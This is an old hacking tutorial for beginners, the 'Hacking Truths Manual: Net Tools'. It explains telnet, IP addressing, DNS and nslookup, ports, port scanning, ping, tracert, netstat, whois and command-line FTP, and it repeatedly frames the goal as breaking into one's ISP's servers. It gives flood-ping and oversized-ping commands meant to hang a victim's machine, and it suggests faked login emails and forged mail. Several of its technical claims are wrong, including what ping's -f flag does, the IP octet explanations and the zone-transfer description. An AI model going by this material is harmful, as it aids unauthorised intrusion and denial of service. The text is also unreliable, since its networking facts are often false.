____________________________________________________________________ The Hacking Truths Manual----Net Tools The 2nd Edition By Ankit Fadia ankit@bol.net.in ____________________________________________________________________ Now that you know how to control the working of the Windows operating system lets go on to the basics of using Internet tools which are really really useful for hacking. Well to tell you the truth, Hacking would be much more easy if you were running some sort of Unix on your machine or if you had a shell account. I am writing this guide keeping in mind the Newbies who are probably stuck with Windows and I am pretty much sure that all those of you who are Linux Geeks will have no problem in figuring out doing the sam ething in Linux. There is a common belief amonst people that Windoze is very insecure and it sucks but then on the other hand Red Hat too is not so great in the security sphere. There are nearly 50 known exploits to get root on a Linux box. The reason why hackers have found so many holes or bugs in Windows is due to the fact the Windows is the most widely used OS in the world and the largest number of Hackers have access to Windows and the largest number of people have a go at Windoze's Security. The only thing that is in support of Linux is the fact that it is free and the concept of Open Source and well, performance. What I want to say is that Linux's performance may be better but I do not agree to what all people say about the low Windoze security.So what I think is that there is nothing wrong in Using a Windoze box for Hacking. Yes Linux does provide you access to some kewl hacking tools from the various shells but for Windows there are many third party freebies that allow you to do the same thing. Linux does make hacking easier but there is nothing wrong in using Windows for Hacking.But for all those of you who think other wise you can and if your ISP does not give shell account you can use your Dial Up PPP account to login into a third party shell acount.To get a free shell account goto www.cyberarmy.com or www.hobbiton.org Their service is pretty good. Telnet Telnet is the ultimate hacking tool which every hacker must know how to use before he can even think about Hacking into servers. Telnet is better described as a protocol which requires or runs on TCP\IP. It can be used to connect to remote computers and to run command line programs by simply typing commands into it's GUI window. Telnet does not use the resources of the client's computer but uses the resources of the server to which the client has connected. Basically it is a terminal emulation program that allows us to connect to remote computers. It is found at c:\windows\telnet.exe in Win9x systems and c:\winnt\system32\telnet.exe in NT machines. If the Path statement in your machine is set correctly then if you just type Telnet at the DOS prompt then it will bring a GUI Windows which actually is the Telnet program. How do I connect to remote computers using telnet? Well it is really simple to connect to remote computers using telnet.Well first launch the telnet application by typing telnet at the DOS prompt. Once the Telnet windows pops up click on Connect>Remote System then in the host name type the host i.e the remote computer you want to connect to. Then in the Port select the port you want to connect to in this case leave it to Telnet. Almost always leave the TermType to vt100. *********************** Hacking Tip: You may be wondering what the Term Type stands for. Well actually it represents various kinds of display units. We use vt100 as it is compatible with most monitors. ********************** Then click connect and you will be connected to the remote machine. Now if you are a newbie you would be using the above method of telnetting to a remote computer and you would not be port surfing. Well if you really want to leanr to hack, port surfing is a must as without learning to port surf you will not be able to find out The basic syntax of the telnet command is C:\>telnet hostname.com Now let's go through this syntax, the word telnet is followed by the host name or the IP address of the host you want to connect to which is then followed by the port on the remote computer you want to connect to.If you are confused by the new terms read on and things will become clearer. What exactly is an IP Address? Like in the real world, everyone has got an individual Home Address or telephone number so that, that particular individual can be contacted on that number or address, similiarly all computers connected to the Internet are given a unique Internet Protocol or IP address which can be used to contact that particular computer. In geek language an IP address would be a decimal notation that divides the 32 bit Internet addresses (IP) into four 8 bit fields. Does the IP address give me some information or do the numbers stand for anything? Let take the example of the following IP address: 202.144.49.110 Now the first part , the numbers before the first decimal i.e 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number, that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibilty in the size of the Network ,there are different classes of IP addresses: Address Class Dotted Decimal Notation Ranges Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx The various classes will be more clear after reading the next few lines. Each Class A Network Address contains a 8 bit Network Prefix followed by a 24 bit host number.They are considered to be primitive.They are referred to as "/8''s" or just "8's" as they have a 8 bit Network prefix. In a Class B Network Address there is a 16 bit Network Prefix followed by a 16 bit Host number. It is reffered to as "16's". A class C Network address conatins a 24 bit Network Prefix and a 8 bit Host number. It is refered to as "24's" and is commonly used by most ISP's. Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where subnetting caame in. Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when subnetting comes in then the IP Addresses structure becomes: xxx.xxx.zzz.yyy where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain same and only the last part i.e. yyy is variable. You may be wondering, what happeded to 127 as after 126.xxx.xxx.xxx there is straightaway 128.0.xxx.xxx. Well 127.0.0.1 is reserved for the loopback function, this means that it refers to the localhost, this means that if you try to telnet to 127.0.0.1 , then the Telnet client will try to connect to your own computer. IP addresses can be of to types Dynamic and Static. Now most of us connect to the Internet by dialing into our ISP through Dial up Networking and using PPP( Point to Point Protocol). Now when you connect to your ISP's server you are assigned a unique IP number which is then used to transfer data to and from your computer. That becomes your address. Now the IP address that you are assigned changes everytime your connect to your ISP i.e. you are assigned a new different IP every time you dial into your ISP, that is how it becomes Dynamic.This means that if you have obtained the IP address of a person once, then if he disconnects and reconnects then you will have to get his IP address again. While other ISP's provide you with a permanent IP address as soon as you register with them. In that case your IP remains the same every time you connect to their server and is thus known as a permanent IP address. ******************* Hacking Tip: You can find out if an IP address is a Dynamic or Static by issuing the ultimate mapping tool on the net: nslookup.Give the following command : nslookup hostname where hostname is substituted by an IP address and if the result is Non-Existant Host/ Domain then the IP is a Dynamic one. If it return the hostname which is human understandable then you can be pretty sure that the IP address is a static one. For more information on DNS lookup and nslookup read on. ****************** Now IP addresses are very difficult to remember, who can memorize IP addresses of all the computers he wants to connect to or the sites he wants to visit.Say for example I am sure you would find hotmail.com more easier to remember than something like 203.43.54.12. Here comes in DNS or Domain Name Systems.Read on for more info on DNS. DNS A DNS is basically a resource for converting friendly Hostnames (like, hotmail.com)which humans can easily understand, into IP addresses which machines need to communicate to the host i.e. hotmail.com Now what basically happens in that when you type www.hotmail.com in the location bar of your browser, the browser needs to perform a lookup to find the machine readable IP address so that it can communicate with the host.This means that the browser cannot communicate with a host if it has the friendly hostname only. Without the IP address, no communication can take place. So for the lookup, the browser contacts the DNS server setup by normally by your ISP and through the resolver tries to look for the IP conversion of the hostname the user wants to contact. A DNS server is basically a server running DNS software.The server that the browser first looks for a translation is the Primary DNS server, if this primary server doesn't show any match then this server contacts another DNS server somewhere on the Internet (This becomes the Secondry DNS Server.)and looks for a match. If a match is found in the secondry server then the Primary server updates it's database so that it doesn't have to contact the Secondry server again for the same match. Each DNS server stores the hosts it has recently looked for in it's cache. Now if the Server has recently looked for a particular hostname, then it does not search for it again but just provides the browser with that information from it's cache. If the cache does not contain a particular entry, then the resolver looks for the desired entry by searching through the entire database. New techologies are being introduced in the DNS sphere. Now take the case of amazon.com. It is a famous and large E-company with over a million users per day.(My rough estimate.) Such large organizations have multiple IP addresses for the same domain name. Today what happens is that the DNS server returns all IP Addresses and the browser chooses a random IP from it. But this new technolofy will allow the DNS server to return the IP of the server which has the least trafiic, so as to enhanse surfing. So you can see DNS does make sense. You can see how time consuming the above process can be and it can really slow down your surfing process, a lot of time is being wasted when the browser contacts the DNS server and performs a lookup, so how do you fasten this process? How do you eliminate the fact that the browser will contact the DNS server each time you want to visit a site? Well the answer lies in the HOSTS file hidden in the c:\windows directory. You can map a machine's IP to any hostname by editing the c:\windows\hosts file(It has no extension.)on win 9.x systems, On NT the hosts file is c:\WinNT\system32\drivers\etc\hosts and on Linux it is /etc/hosts. A hosts file looks something like the below: ############################### # Copyright (c) 1998 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP stack for Windows98 # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.xx.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host 1. localhost ##################################### For example, if you know that the IP address of say hotmail.com is 207.xxx.xxx.xxx., then if you add the following in the Hosts file then the browser will not perform a lookup and will starighaway have the IP to communicate with the host. So add the line: 207.xxx.xxx.xxx www.hotmail.com Now your browser will connect faster to Hotmail.com. This technique can increase your surfing speed tremendously.So now that you know what a DNS is...let get on to the subject of DNS lookup and Reverse DNS lookup. Now Linux or any other form of Unix come with a very interesting utility known as nslookup. This can be used to gather some very valueable information about a host. For details as to how to use this tool to gather information read the man pages. Windows users can download SamSpade from www.samspade.org to perform a nslookup. Just as DNS lookup converts the hostname into IP address, a Reverse DNS Lookup converts the IP address of a host to the hostname thus we can conclude that a DNS lookup return machine readable IP addresses and a reverse DNS Lookup returns the human friendly hostname. **************************** INFO: The DNS software normally runs on Port 53 of a host. So the browser connects to port 53 to perfom a DNS lookup. *************************** NslookUp So how can you use nslookup to gain some valuable information about a host? Well the best way to learn about a particular Unix command is to read the man pages.They are the ultimate source of all Unix commands and their parameters. Now the first thing to do is, either get SamSpade from www.samspade.org or if you are using a shell account or are running any form of Unix then locate where the nslookup command is hidden by issuing the following command: ' whereis nslookup '. I am just giving you a general introduction to nslookup, to meanr about all Resource records or query types do read through the Man pages. You can use nslookup in two modes, either in the interactive mode or in the non interactive mode.First I will explain the Interactive mode. If you type nslookup at the shell prompt then it launches say, the nslookup utility or the nslookup command. $>/usr/etc/nslookup Default Server: hobbiton.org Address: 12.12.12.12 Now when you type just nslookup, the machine will return the IP address and the name of the server which is running the nslookup command for you,in this case it would be my shell account provider. Now once launching nslookup you need to specify the query type, which is the type of Resource Record (RR) by typing: set type: RR where RR can be any of the following: A : Address MX : Mail Exchanger PTR : Pointer CNAME: Canonical Name HINFO: Host Info. ANY : In this case a zone transfer takes place and all information of the host is returned, as a result additional burden is put on the host and hence may cause the host to hang or restart. NOTE: To get full list of RR's read the man pages. Now once the RR or the type has been set, you need to type in the host name or the IP of the server you want to gather info of. This might not be that clear, so let me take you through an example. Firstly for this example I am using my Linux box and am not logged on to any shell account so my IP would be 127.0.0.1 and am doing a A type nslookup on the host hotmail.com $>nslookup Server: localhost Address: 127.0.0.1 >set type=A >hotmail.com Server: localhost Address: 127.0.0.1 Note: I have typed whatever is after > and other lines are written by the computer. This will return the address info of the host hotmail.com. Do try it out and see what you get. Now if we want to run nslookup in Non Interactive Mode, then we have to write the command in the following format: $>nslookup Hostname Now in all the above examples, we did a normal DNS lookup on the host. We can also use nslookup to perform a reverse DNS lookup by instead of mentioning the Hostname, by mentioning the IP of the host. Eg. $>nslookup IP address Now that you have understood the whole concept of DNS you know what happens when we issue the /dns command in IRC. There is yet another Unix utility or command called DIG or Domain Information Groper which too like nslookup gives info on the host. It too is a part of SamSpade. Ports Now that you no what an IP is and what DNS or the hostname is, lets move on to Ports. There are basically two kinds of ports--Physical(HardWare) and Virtual (Software) You may be knowing ports to be the slots behind your CPU to which you connect your Mouse or Keyboard or your monitor. Well they are physical Hardware real ports.The ports we Hackers are interested with are virtual software ports.A port is a virtual pipe through which information goes in and out. A particular computer can have a large number of ports. All ports are numbered. Now at each port a particular service is running. A software which runs on a port is called a service. So how do you know which service is running on which port. Well all ports are numbered and there is a general rule which almost everyone follows which decides which service usually runs at which port. Some popular ports and services running are: Ping 7 Systat 11 Time 13 NetStat 15 SSH 22 (This is same as Secure Shell Login) Telnet 23 SMTP 25 Whois 43 Finger 79 HTTP 80 POP 110 NNTP 119 rlogin 513 (IP Spoofing can be used here.) To get an entire list of port numbers and the corressponding service running at that particular port, read RFC 1700 . Ports under 1024 usually have popular well known services running on them. The higher port numbers are used say, when your browser needs to connect to a remote server maybe when the browser connects to port 80 of the remote server and requests for the default webpage. So in these cases the browser chooses a random port above 1024. ************ Newbie Note: What the hell is a RFC? Well RFC stands for Request For Comment. They are texts which cover each and every aspect of Networking and the Internet. They are written by geeks and if you want to become an uberhacker then you will have to by hear all RFC's. All these new terms and the whole TCP\IP protocol may sound weird and difficult to grasp but if you want to be a good hacker then you will have to stay with them the rest of your lives.To locate a RFC just go to your fav search engine and type the RFC number. ************* ************* NewBie Note: What is a Daemon? Well a daemon is a program that runs in the background at many Unix ports. If you find a service or a daemon running at a port, I am sure that computer is hackable. ************* Port Scanning & Port Surfing Now that you know everything about Telnet and have some basic Networking knowledge lets have some fun by learning to Port Surf. It is the first basic step in finding a hackable server running a daemon with a hole or a vulnerability. Say you want to hack into your ISP's server, what do you do? You firstly find out the hostnames of the servers runned by your ISP. Now each server can have a large umber of open ports and it would take days to manually go to each port and then find out that no service is running at that port. So here come in the Port Scanning Utilities which give a list of open ports on a server. Some port scanners alongwith the list of open ports also gives the services running on each port and it's vulnerabilties, if any. Now port scanning takes advantage the 3-stage TCP handshake to determine what ports are open on the remote computer. To learn more about the TCP\IP protocol read the networking manuals that I distribute on my mailing list. Tools like SATAN and lots of them more allow you to find out the list of open ports, the daemon or the service running at each open port and also the service's vulnerability at the click of a button. You can't call yourself a hacker if you need some Software which first of all is not written by you to do something as lame as a port scan. Well yes I do agree that looking for open ports on a server would take a long time. But what I am suggesting is that you use a Port scanning tool which just gives you a list of open ports without the list of services and the vulnerabilities. I assure you, if you try and explore an open port of a remote server manually, you will be able to learn more about the remote system and also it will give you a taste of what hacking actually is. If you use a port scanner which gives you all details at the click of a button to impres your friends, let me assure you none of them will be impressed as I am sure anyone can use SATAN and other such scanners. Another thing you need to be careful about before port scanning your ISP is that most port scanners are very easily detected and can easily be traced and you have no excuse if you are caught doing a port scan on a host., it a sure sign of Hacker Activity.There are many stealth scanners like Nmap which claim to be untraceable. But the truth is that they are very much traceable and they are quite inaccurate as they send only a single packet to check if a port is open or not. And if the host is running the right kind of Sniffer software maybe Etherpeek then the Port scan can be easily detected and the IP of the user logged. Anyway some ISP's are really afraid of Hacking activites and even at the slightest hint of some suspicious hacking activity something like Port scannng, they can remove your account.So just be careful. ************ Evil Hacking Trick: Well try to keep an eye on TCP port 12345, and UDP port 31337 these are the default ports for the popular trojans NetBus and BO, respectively ************* Some ISP's are quite aware of Hacking Activites and are one step ahead. They may be running some excellent software which will keep hackers away. EtherPeek is an excellent example of a sniffing software which can easily trace users who are port scanning. Nuke Nabber a Windows freeware claims to be able to block Port Scans. I have not tested it so I can't say for sure. Then there is another fun program known as Port Dumper which can fake daemon( services) like Telnet, Finger etc. How can I find out my own IP address and what ports are open on my machine? All this talk about IP's and ports may have made you quite interested in this subect and you may be dying to find out a method of finding out open ports on your machine and your own IP address. Well just type the following at the DOS prompt (Windows users) or the bash prompt (Unix users): netstat -a This will return something like the following: C:\WINDOWSnetstat -a Active Connections Proto Local Address Foreign Address State TCP ankit-s-hax-box:1030 0.0.0.0:0 LISTENING TCP ankit-s-hax-box:1033 0.0.0.0:0 LISTENING TCP ankit-s-hax-box:1027 0.0.0.0:0 LISTENING TCP ankit-s-hax-box:1030 mail2.mtnl.net.in:pop3 ESTABLISHED TCP ankit-s-hax-box:1033 zztop.boxnetwork.net:80 CLOSE_WAIT TCP ankit-s-hax-box:137 0.0.0.0:0 LISTENING TCP ankit-s-hax-box:138 0.0.0.0:0 LISTENING TCP ankit-s-hax-box:nbsession 0.0.0.0:0 LISTENING UDP ankit-s-hax-box:1027 *:* UDP ankit-s-hax-box:nbname *:* UDP ankit-s-hax-box:nbdatagram *:* Sockets and Ports Explained Note: I am assuming that you have at least some knowledge about TCP\IP. What is all the hype about socket programming? What exactly are sockets? TCP\IP or Transmission Control Protocol\ Internet Protocol is the language or the protocol used by computers to communicate with each other over the Internet. Say a computer whose IP address is 99.99.99.99 wants to communicate with another machine whose IP address is 98.98.98.98 then would will happen? The machine whose IP is 99.99.99.99 sends a packet addressed to another machine whose IP is 98.98.98.98. When 98.98.98.98 receives the packet then it verifies that it got the message by sending a signal back to 99.99.99.99. But say the person who is using 99.99.99.99 wants to have simunateously more than one connections to 98.98.98.98.....then what will happen? Say 99.99.99.99 wants to connect to the FTP daemon and download a file by FTP and at the same time it wants to conect to 98.98.98.98's website i.e. connect to HTTP daemon. Then 98.98.98.98. will have 2 connects with 99.99.99.99 simountaneously.Now how can 98.98.98.98. distinguish between the two connections...how does 98.98.98.98. know which is for the FTP daemon and which for the HTTP daemon? If there was no way to distinguish between the two connections then they would both get mixed up and there would be a lot of chaos with the message meant for the HTTP daemon going to the FTP daemon. To avoid such confusion we have ports. At each port a particular service or daemon is running by default. So now that the 99.99.99.99 computers knows which port to connect to, to download a FTP file and which port to connect to, to download the web page, it will communicate with the 98.98.98.98 machine using what is known as the socket pair which is a combination of an IP address and a Port. So in the above case the message which is meant for the FTP daemon will be addressed to 98.98.98.98 : 21 (Notice the colon and the default FTP port suceeding it.). So that the receiving machine i.e. 98.98.98.98 will know for which service this message is meant for and to which port it should be directed to. In TCP\IP or over the Internet all communication is done using the Socket pair i.e. the combination of the IP address and the port. DOS Hacking utilities shipping with Windows and Linux Utilities too Most Hacker Friendly utilities that ship with Windoze are hidden and a normal user will not be able to find them.All of them are either in the c:\windows directory or are in the Windows Installation CD. PING Now lets start with what exactly Ping is. Now Ping is a part of the ICMP protocol i.e the Internet Control Message Protocol. ICMP is a protocol used to troubleshoot TCP\IP networks. Ping is a command which sends out a datagram to the specified host. This specified host if alive i.e. turned on sends out a reply or echos off the same Datagram. If the datagram that reaches back to your computer has the same datagram that was sent then it means that the host is alive. So Ping is basically a command which allows you to check if a host is alive or not. It can also be used to calculate the amount of time taken for a datagram to reach the host. It is so deadly that it can be used to ping a hostname perpetually which may even cause the host to crash. Now what happens is that when a host receives a Ping signal, it allocates some of it's resources to attend to or to echo back the datagram. Now if you Ping a host perpetually, then a time will come when all resources of the host are used and the host either hangs or restarts. Due to Ping's deadly nature, most shell account ISP's hide the Ping utility. To find it issue the folowing command: whereis ping It is usually hidden in /usr/etc Ping has many parameters and a list of parameters can be found by reading the man pages or if you are running Windows you can get help by simply typing ping at the DOS prompt. The flood ping which pings a host perpetually is: ping -f hostname ping -a hostname can be used to resolve addresses to hostnames. When I typed ping at the dos prompt I go the following help: C:\WINDOWS>ping Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] | [-k host-list]] [-w timeout] destination-list Options: -t Ping the specifed host until stopped. To see statistics and continue - type Control-Break; To stop - type Control-C. -a Resolve addresses to hostnames. -n count Number of echo requests to send. -l size Send buffer size. -f Set Don't Fragment flag in packet. -i TTL Time To Live. -v TOS Type Of Service. -r count Record route for count hops. -s count Timestamp for count hops. -j host-list Loose source route along host-list. -k host-list Strict source route along host-list. -w timeout Timeout in milliseconds to wait for each reply. You can even Ping yourself. Earlier I had told you guys that the IP 127.0.0.1 is the local host, this means that when you connect to 127.0.0.1 then you actually connect to your own machine. So to ping yourself perpetually , issue the following command: ping -f 127.0.0.1 Well actually the Flood ping no longer works on most OS's as they have be updated. The following Ping command creates a giant datagram of the size 65510 for Ping. It might hang the victim's computer. C:\windows>ping -l 65510 Tracert When you type hotmail.com in your browser, then your request passes through a large number of Computers before reaching hotmail.com. Or when you login to your Shell account and type the password then this password passes through a large number of computers before reaching the shell account server. To find out the list of servers your password of the request passes through, you can use the tracert command. In Unix you can use the traceroute command. Again I got help by simply typing tracert at the DOS prompt. C:\WINDOWS>tracert Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name Options: -d Do not resolve addresses to hostnames. -h maximum_hops Maximum number of hops to search for target. -j host-list Loose source route along host-list. -w timeout Wait timeout milliseconds for each reply. Lets take an example of tracing the path taken by a datagram to reach hotmail.com from your machine. To do this simply type the following command: C:\windows>tracert hotmail.com Instead of Hotmail.com you can also write the IP address of Hotmail.com which you can get by doing an nslookup. Try tracert with different parameters and see what the result is. That is the best way to learn how this command works. Netstat This is by far the most interesting hacking tool which gives some important information about your ISP. Netstat soesn't display any help information unless you type netstat /?. I got the following info: C:\WINDOWS>netstat /? Displays protocol statistics and current TCP/IP network connections. NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] -a Displays all connections and listening ports. -e Displays Ethernet statistics. This may be combined with the -s option. -n Displays addresses and port numbers in numerical form. -p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP. -r Displays the routing table. -s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default. interval Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once. The -a parameter can be used to list the open ports on your computer and your IP address. I have explained it in the IP address section. For example, C:\windows>netstat -a Will display the Kernal Routing Information, ports open on your machine, your IP, the IP of the host you are connected to and also the port of the host to which you are connected to. If you are logged into your shell account and give the netstat command then it may give the IP addresses of all people who are logged into that server at that moment. All these IP's are Dynamic of course. Another intersting command is the nbtstat command which too is a great tool to get excellent valuable info on a host your are connected to. For more info type nbtstat at the prompt. C:\windows>nbtstat -A The above-mentioned command will allow the hacker to obtain a list of usernames, system names, and domains.I will mention maore about this command in the Hacking Truths Manual on File Sharing. Arp and Route are really advanced comamnds which I do not think should be mentioned in a newbies manual. But all of you who want more info on any of these commands can either try simply typing the name of the command or the command name followed by /? Eg Command /? Will display help on the command. ********************** Hacking Tip: ARP (Address Resolution Protocol) is used to translate IP addresses to Ethernet addresses. The translation is done only for outgoing IP packets, because this is when the IP header and the Ethernet header are created. IP address Ethernet address 1. 08-00-39-00-2F-C3 Route is used to display info on the routing tables. ********************** WHOIS: Getting Info about a Domain How do you get a .com registration? Well you register with Network Solutions give them some money and you have your own domain name i.e. your very own .com registration. Now all people who register with Network Solutions have to fill a form in which they have to enter information like Name, Contact Information , Email Address, IP address and much more. Now all this data or info is stored in a DataBase mentained by Network Solutions. You can perfom a query which is known as a Whois query and gather information on a particular domain or host. Say you want to find out the IP or the name of the person who owns the www.hotmail.com domain,what do you do? Well either you could go to Network Solutions site or internic.net and enter hotmail.com in the input box or you can directly enter the following in the location bar of your Browser and make a whois enquiry. Enter the following in the location bar of your browser: http://205.177.25.9/cgi-bin/whois?hotmail.com Note: Replace Hotmail.com with the domain name of which you want to perfom a WHOIS query. Manual Port Surfing You have obtained the list of open ports by using some canned hacking tool. Now what do you do? Connect to each port of the remote server i.e. your ISP. Now earlier I taught you a lame method of telnetting to a remote server. Now lets get to an cool method of connecting to a remote computer.You are not a Hacker if you do not telnet like this: C:\windows> telnet hostname.com ### Well this command is pretty much self explanatory. Telnet calls the telnet program, Hostname is the hostname or the IP of the remote server and ### is the open port of the remote server you want to connect to. It is not necessary that as port 25 is normaly the SMTP port, each and every server would be running SMTP at port 25. It all varies from Server to server. If you learn Port surfing then you can connect to the FTP (21) daemon and download or upload files, connect to SMTP daemon and send mail even forged mail, POP (110) to receive mail and HTTP (80) to download web pages. OK get ready to explore the most common ports which are likely to be open on your ISP's servers. Port 23 is the default port to which Telnet connects to if the port number is not given. Generally when we are connected to Port 23 of the remote server then we are greeted by a Welcome Banner and then we are given the Login Prompt. Generally connecting to Port 23 also gives the Name of the OS running at the remote server which is invaluable in finding exploits as a particular exploit may work only if the remote computer is running the same combination of service and Operating System. Basically connecting to Port 23 gives us the OS of the remote computer. WIN 95/98/NT don't ship with telnet servers so unless the telnet server is installed Port 23 would no be open. So if Port 23 of your ISP is not open then it should be safe to think that the server is not runnign Win 95/98/NT. But you can never be sure just maybe your ISP has installed a telnet server and is running Windows. Nowdays almost none of the ISP's keep Port 23 open as the number of Hackers has really increased. Now lets move on to Port 21 or the FTP Port. Do you use Cute FTP or some other FTP client? Ever wondered how it works? FTP or Port 21 Explained First of all FTP stands for File Transfer Protocol.To read geek stuff on the FTP protocol read RFC 114 and RFC 959. FTP or File Transfer Protocol is a Protocol used to transfer files from a server to a client. Now a server would be the computer you are connected to and the client would be you yourself. To connect to a FTP server we need to have a FTP software known as the FTP client.This basically is protocol popular for tranfering files from the server to the client or vis-a-versa.So we can say that FTP servers will allow you to download and also upload files. LIST OF FTP SERVERS Unix FTPD Win9x WFTPD, Microsoft Frontpage Win NT IIS Mac FTPD Well it is really a simple process of FTP'ing to your favourite site. Infact Windows itself ships with a FTP client which is quite lame and I do not at all recommand it, but still what the heck. How FTP is actually quite self explanatory, now the FTP Client i.e the program that you run at your computer first contacts the FTP daemon (Service running at Port 21) on the server specified, if the Server has a FTP daemon running then you might get a welcome screen which is also known as the Daemon Banner. A daemon Banner would be something that either displays a welcom emessage and info on the OS or service running on the host you have FTP'ed to.A daemon banner gives us valuable info on the host we connect to.Just remmember that if we want to get root or break into a FTP server then we need to search for a hole we can exploit, tand to search for a hole which we can exploit, we need to know the OS, the OS version and also the version on the FTP server running by the host. This means that say there is a FTP server which has 2 versions, one that runs in Windows and the other that runs in Unix. If say the Unix version has a hole, then it is not necessary that the Windows version too would have the same hole. A hole exists due to the combination of the Server running at the OS running at the host. This means even if the OS is different but the FTP server is the same, the hole would not work.So before you start to look for holes in the FTP server running at your ISP, just note down the OS version and the FTp server version running at your ISP.The daemon banner is followed by the Password Prompt. Something like the Following: Connected to web2.mtnl.net.in. 220- 220-#************************************************************* 220-# Welcome to MTNL's ftp site 220-#************************************************************* 220-# 220-# You can upload your own homepages at this site!!! 220-# 220-# Just login with your username and upload the HTML pages. 220-# (You can use your favourite HTML editor as well) 220-# 220-# World will see it at http://web2.mtnl.net.in/~yourusername/ 220-# 220-# So get going......UNLEASH YOUR CREATIVITY !!!! 220-# 220-#************************************************************* 220- 220 ftp2.mtnl.net.in FTP server ready. User (web2.mtnl.net.in:(none)): ankit 331 Password required for ankit. Password: Now most FTP daemons are badly configured, well actually I should say the system administrators allow Guest or anonymous Logins. What I mean by that is the FTP Daemon allows you to enter Guest or Anonymous as the Username. If you login through the Guest account, then it asks you for your email address, so that it can add to the server logs that you visited that site and used the FTP Daemon. Here instead of your true email address, you can make one up in your mind, just remember to put the @ sign in between and of course no spaces. So How Do I use the Windows FTP Client? Well first of all I think the FTP client which ships with Windows is not a GUI application.I personally do not like it and think you should either use your Favourite FTP Client or use the Telnet Application that ships with Windows to connect to Port 21. Anyway for those of who are die hard Microsoft fans or want to learn each and every thing in Windows, I will explain how this FTP Client is used. Actually this FTP program is quite powerful and it makes Hacking cool. If you use a GUI FTP program for hacking to impress your friends then they would probably say that anyone can use a GUI. This Windows FTP program may seem formidable to some at first sight. Now first of all goto MS DOS to run this program as it runs in DOS.Now type FTP to launch it. C:\WINDOWS>ftp Your prompt will change to ftp> This is the FTP prompt and signifies that the FTP Client has been launched and is running. Now to transfer files or to do some FTP Hacking you need to know the FTP commands. To get a list of FTP commands type Help at the FTP prompt. ftp> help Commands may be abbreviated. Commands are: ! delete literal prompt send ? debug ls put status append dir mdelete pwd trace ascii disconnect mdir quit type bell get mget quote user binary glob mkdir recv verbose bye hash mls remotehelp cd help mput rename close lcd open rmdir ftp> You may get something like the above on your screen.Instead of typing Help you could also type ? that too would give the same result. Now to get Help on individual Commands type the following: ftp>help [command] Like say for example, I want to learn how to use the cd command what it does then I type the following: ftp>help cd The FTP program will return this: cd Change remote working directory Note: Instead of the Above I could also have typed: ftp>? Cd Different FTP Commands: Now the Get command is used to get files from the server you are connected to. ftp>get file.txt This will get or download the text file with the name file. To download multiple files one cannot use the get command. The mget or the multiple gets command is used instead.(the m in mget stands for multiple) For example the following gets all text files from the host, ftp>mget *.txt Say you want to upload a single file then you use the put command and to upload multiple files use the mput command. Say you are working in the Windows Directory and want to change to the c:\windows\temp directory while you are in the process of uploading files, so change the local directory use the lcd command. For example, ftp>lcd temp This will make temp the current local working directory. The Bye or Close commands are basically terminating commands.The ! commad allows you to escape to the shell at any moment. Another interesting command is the SYST command which gives us information on the server's OS and FTP server's version etc.This is excellent to get info on the host's OS cersion and FTP daemon's version, so that you can seacrh for it on the net. For a single line description of each command use the help or the ? command followed by the command you want info on. Now that you know some of the Basic FTP commands let me take you through the process of uploading your site to your ISP's server. I am assuming that your ISP's hostname is isp.net and all the files that have to uploaded to the ISP's server are in the directory c:\Site First lets start my connecting or FTP'ing to your ISP. There are 2 ways to start a FTP session.First way is to pass an argument alognwith the Ftp Command i.e. you can directly connect to a host by typing ftp followed by the hostname. The second method involves firstly the launching of the FTP client and then using the Open command to connect to the host. Fot more info on the open command type help open For Example, C:\windows>ftp isp.net Or C:\windows>ftp ftp>open isp.net In most cases after you have connected to the host i.e your ISP you will see the Welcome Banner or your ISP and then it will ask for a username and a password. Enter them. If you do not have them then try the Anonymous or the Guest Login or read on to learn to Hack into a FTP server.Anyway getting back to the uploading of the website. Now remember that the files you want to upload are in the c:\site directory but the current local working directory is Windows( It is normally the Default Directory in which MS DOS would open,) So before starting to upload files you need to change the Local working directory from c:\windows to c:\site. So to this use the lcd command. For Example, ftp>lcd c:\site Now you are set to upload the files, I am assuming that all files in the directory need to be uploaded, if that is not the case then use the WildCard " * " symbol and make the necessary selections. ftp>mput *.* Voila you have just uploaded your own website by using a command line FTP program you have finally learnt to do without the GUI clients. You may say that all this stuff is stupid and you do not give a damn about uploading your site and want to learn how to break into FTP servers and steal passwords....well if you are reading this manual then I am sure you have no knowledge about how to hide your identity while connecting to a FTP server.You see whenevr you connect to a FTP server, any server for that matter, your IP is recorded in the Server log and when the system administartor finds that someone is downloading the passwords file, then I am pretty much sure that he would not be too pleased and you will find that the feds are fighting with the SS outside your house as to who gets to arrest you. It is illegal to download password file which is not available to the normal public.Now don't get the wrong idea that I am against hacking or something, but what I want you guys to understand is that I do not want you guys to get caught, and like I said before, if U reading this manual then you do not know how to edit the server logs and how to hide your identity, how to erase all your tracks from the victim's server and how to create a backdoor to the server so that you can access it whenever you want. Common FTP Hacks There are various FTP servers with various versions. No FTP server is fully clean of bugs. There are so many bugs that even if I write a line of each it would become too loooooooong. But you can seacrh 